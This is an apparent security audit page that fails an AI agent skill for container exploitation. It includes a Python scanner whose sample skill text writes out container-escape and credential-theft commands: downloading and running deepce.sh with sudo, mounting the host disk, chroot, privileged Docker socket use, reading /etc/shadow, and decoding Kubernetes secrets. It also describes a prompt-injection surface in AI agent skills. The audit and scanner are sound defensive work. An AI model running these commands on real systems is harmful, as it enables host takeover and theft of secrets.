exploiting-containers
Fail
Audited by Gen Agent Trust Hub on Mar 21, 2026
Risk Level: HIGH
Categories: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill downloads an external shell script (deepce.sh) from an unverified GitHub repository with wget, then instructs the agent to mark it executable (chmod +x) and run it with elevated privileges.
- [COMMAND_EXECUTION]: Includes high-risk container-escape commands: mounting a host block device (mount /dev/sda1 /mnt/host), chrooting into the mounted host filesystem, and abusing the Docker socket to start new privileged containers.
- [EXTERNAL_DOWNLOADS]: Fetches automated exploitation tooling and makes network requests to external container registries and Kubernetes API servers to pull images or manifests from potentially untrusted sources.
- [DATA_EXFILTRATION]: Specifically targets sensitive credentials and files: the host's /etc/shadow, Kubernetes service account tokens, and the base64-encoded Secret objects stored in the cluster.
- [PROMPT_INJECTION]: The skill exposes a significant indirect prompt-injection surface. Ingestion points: Kubernetes API responses, container logs, and image layer metadata (per SKILL.md). Boundary markers: none. Capability inventory: command execution (chroot, mount), filesystem access, and network requests (curl, wget). Sanitization: none; external content is neither validated nor escaped before it reaches the model.
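The findings above can be reproduced with a static scan of the skill text. The scanner below is an added example written for this page, not the Gen Agent Trust Hub's own analysis: its regexes, the pass/fail threshold, and the sample SKILL.md it scans are all assumptions chosen to match the commands the audit names (wget of deepce.sh followed by chmod +x and a sudo run, mount of a host block device, chroot, the Docker socket, /etc/shadow, the service account token path, kubectl secret dumps piped to base64 -d, and log output that the agent reads back without boundary markers). The example URL and container names are constructed.

```python
"""Static scanner for agent skill definitions (SKILL.md plus bundled shell).

Added example: it applies the risk categories used in this audit to a
constructed skill text. Patterns and the verdict threshold are assumptions,
not the Gen Agent Trust Hub's own rules.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    category: str
    line_no: int
    line: str
    reason: str


# Tracked separately so scan() can remember which files were made executable.
CHMOD_X = re.compile(r"\bchmod\s+\+x\s+(\S+)")

# (category, pattern, reason). One finding per rule per line.
RULES = [
    ("EXTERNAL_DOWNLOADS", re.compile(r"\b(?:wget|curl)\s+[^\n]*https?://"),
     "fetches content from an external URL"),
    ("REMOTE_CODE_EXECUTION", CHMOD_X, "makes a file executable"),
    ("COMMAND_EXECUTION", re.compile(r"\bmount\s+/dev/[a-z]+\d*\s+\S+"),
     "mounts a host block device"),
    ("COMMAND_EXECUTION", re.compile(r"\bchroot\s+\S+"),
     "changes root into another filesystem"),
    ("COMMAND_EXECUTION",
     re.compile(r"/var/run/docker\.sock|\bdocker\s+run\s+[^\n]*--privileged"),
     "uses the Docker socket or starts a privileged container"),
    ("DATA_EXFILTRATION", re.compile(r"/etc/shadow\b"),
     "reads host password hashes"),
    ("DATA_EXFILTRATION",
     re.compile(r"/var/run/secrets/kubernetes\.io/serviceaccount/token"),
     "reads the Kubernetes service account token"),
    ("DATA_EXFILTRATION",
     re.compile(r"\bkubectl\s+get\s+secrets?\b|\bbase64\s+(?:-d|--decode)\b"),
     "dumps or decodes cluster secrets"),
    ("PROMPT_INJECTION",
     re.compile(r"\b(?:kubectl|docker)\s+logs\b|\bdocker\s+(?:inspect|history)\b"),
     "ingests untrusted output (logs, image metadata) with no boundary markers"),
]

# Assumed threshold: any of these categories fails the skill outright.
HIGH_RISK = {"REMOTE_CODE_EXECUTION", "COMMAND_EXECUTION", "DATA_EXFILTRATION"}


def scan(text: str) -> list[Finding]:
    """Return one Finding per (line, rule) hit, plus a finding whenever a file
    that an earlier line made executable is run, noting sudo if present."""
    findings: list[Finding] = []
    executables: set[str] = set()
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):  # blank, markdown heading or comment
            continue
        for category, pattern, reason in RULES:
            m = pattern.search(line)
            if not m:
                continue
            findings.append(Finding(category, n, line, reason))
            if pattern is CHMOD_X:
                executables.add(m.group(1).lstrip("./"))
        # A script that was chmod +x'ed and is now invoked as ./name
        for name in sorted(executables):
            if re.search(rf"(?:^|\s)(?:sudo\s+)?\./{re.escape(name)}(?:\s|$)", line):
                elevated = re.search(r"\bsudo\s", line) is not None
                findings.append(Finding(
                    "REMOTE_CODE_EXECUTION", n, line,
                    "runs a downloaded script"
                    + (" with elevated privileges" if elevated else "")))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per category."""
    return dict(Counter(f.category for f in findings))


def verdict(findings: list[Finding]) -> str:
    """'Fail' when any high-risk category fires (assumed threshold)."""
    return "Fail" if any(f.category in HIGH_RISK for f in findings) else "Pass"


# Constructed sample skill text; not the audited skill's actual SKILL.md.
SAMPLE_SKILL = """\
# exploiting-containers (constructed sample for this example)

## Enumerate
wget https://github.com/example/deepce/raw/main/deepce.sh
chmod +x deepce.sh
sudo ./deepce.sh

## Escape
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
cat /etc/shadow

## Docker socket
docker -H unix:///var/run/docker.sock run --privileged -it alpine sh

## Kubernetes
cat /var/run/secrets/kubernetes.io/serviceaccount/token
kubectl get secret db-creds -o jsonpath='{.data.password}' | base64 -d
docker logs web
"""

if __name__ == "__main__":
    results = scan(SAMPLE_SKILL)
    for f in results:
        print(f"{f.category:22} L{f.line_no}: {f.reason}")
    print(summarize(results), verdict(results))
```

The chmod-then-execute tracking is what turns a bare download into the REMOTE_CODE_EXECUTION finding: neither wget nor chmod alone proves the script runs, but `sudo ./deepce.sh` after `chmod +x deepce.sh` does. The PROMPT_INJECTION rule is deliberately crude; a static grep can only point at commands whose output the agent will read back, it cannot tell whether that output is wrapped in boundary markers before reaching the model.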
Recommendations
- AI detected serious security threats
Audit Metadata